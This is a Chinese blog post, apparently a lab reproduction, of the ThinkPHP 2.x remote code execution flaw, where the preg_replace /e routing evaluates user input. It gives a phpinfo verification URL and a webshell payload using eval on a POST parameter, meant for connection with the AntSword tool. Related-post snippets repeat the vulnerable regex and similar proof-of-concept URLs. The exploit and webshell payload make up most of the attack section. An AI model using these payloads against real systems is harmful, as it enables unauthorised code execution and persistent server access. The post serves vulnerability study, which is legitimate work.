thinkphp-2x-rce 代码执行

于 2024-07-29 09:04:03 发布
阅读量158 收藏
点赞数 3
分类专栏: # 命令执行 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140761920
版权

一、漏洞概述

ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞

二、影响范围

ThinkPHP 2.x

三、访问页面

四、漏洞复现

1、漏洞验证

/index.php?s=/index/index/xxx/${@phpinfo()}

2、webshell的payload,使用蚁剑等工具连接。

/index.php?s=a/b/c/${@print(eval($_POST[cmd]))}

风中追风-fzzf
关注
专栏目录
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2255
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
ThinkPHP 2.x RCE
weixin_45439731的博客
07-26 308
preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)即:在目标字符中寻找符合正则规则的字符,替换为替换字符,如果此时的正则规则中使用了/e这个修饰符,则存在代码执行漏洞。知识点:/e 修饰符配合preg_replace()函数使用,可以把匹配到的字符串当作正则表达式执行PHP版本在5.2~5.6可以执行,但在PHP>=7时,不支持/e修饰符。
thinkphp-2x-rce 代码执行[VULFOCUS]
m0_37638874的博客
09-08 888
ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。s=/模块/控制器/操作/[参数名/参数值…http://serverName/index.php(或者其他应用入口文件)/模块/控制器/操作/[参数名/参数值…在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由。值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将。
thinkphp-2x-rce 代码执行漏洞复现
weixin_42675091的博客
09-06 385
thinkphp-2x-rce 代码执行漏洞复现
thinkphp-2x-rce 1 代码执行
weixin_51558394的博客
08-17 488
thinkphp-2x-rce 代码执行
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
Thinkphp 2.x rce
qq_53086690的博客
11-23 936
Thinkphp 2.x rce Thinkphp简介 Thinkphp 是一个开源的,快速、简单的面向对象的轻量级PHP开发框架 漏洞影响版本 Thinkphp 2.x 漏洞概述 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行
thinkphp 2.x 任意代码执行
qq_41048303的博客
12-16 1805
thinkphp 2.x任意代码执行 1.漏洞概述 ​ ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); ​ 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 ​ ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。 2.环境搭
thinkphp2-rce远程代码执行漏洞
最新发布
weixin_45653478的博客
04-27 447
ThinkPHP 2.x版本中,使用的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
rce php远程命令执行,漏洞复现-2.x rce-Thinkphp远程命令执行
weixin_36328210的博客
03-23 258
漏洞复现-2.x rce-Thinkphp远程命令执行0x00实验环境攻击机:win10靶机:Ubuntu18 (docker搭建的vulhub靶场)0x01实验引用影响Thinkphp 2.x的版本0x02实验目的学习更多的命令执行姿势,同时了解thinkphp 2.x命令执行的原理0x03实验步骤访问页面,发现是一个Thinkphp的CMS框架,由于是漏洞复现,我们能很清楚的知道它的版本是2....
ThinkPHP 5.x RCE分析
0verWatch的博客
02-15 6168
第一次进行代码量这么大的分析,记录一下,个人感觉新手真的不适应这种,应该找点小一点的cms去分析,如果不懂MVC架构真的可能会懵。。。 前言 在分析这个之前还看了两篇tp5的RCE漏洞,这两个洞都是很相似的,都是利用一个可控的变量dispatch去实现到最后还是构造出回调函数,可以学习一下,感觉这里面的思路就是本文分析漏洞的来源 https://xz.aliyun.com/t/3845 https...
ThinkPHP 2.x 任意代码执行漏洞
EC_Carrot的博客
08-17 147
漏洞详细 详细请看:https://vulhub.org/#/environments/thinkphp/2-rce/ 漏洞复现 直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行代码phpinfo():
【vulhub】thinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 487
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
vulfocus打靶笔记
weixin_61913198的博客
10-19 290
1.名称: 命令执行漏洞 2.thinkphp-2x-rce 代码执行 3.thinkphp 代码执行 (CNVD-2018-24942) 4.名称: drupal 代码执行 (CVE-2019-6340) 5.名称: Spring Boot 目录遍历 (CVE-2021-21234) 6.名称: tomcat 文件上传 (CVE-2017-12615)
[ThinkPHP]2-Rce 复现
satasun的博客
12-07 1579
[ThinkPHP]2-Rce 复现 环境搭建 github传送门 BUU传送门 POC 老懒狗选择buu http://node3.buuoj.cn:26104/ poc http://node3.buuoj.cn:26104?s=/index/index/name/$%7B@phpinfo()%7D exp 我试了一下直接用system调用命令好像不行,可能因为中间掺杂了一些符号,这边利用eval函数进行绕过。 http://node3.buuoj.cn:26104/?s=/index/index
thinkphp2-rce
07-28
ThinkPHP 2.x版本中存在远程代码执行RCE)漏洞。该漏洞可以通过构造恶意的请求来执行任意的PHP代码。具体来说,漏洞出现在ThinkPHP框架中的路由处理函数中,使用了不安全的preg_replace函数,并且使用了/e模式进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值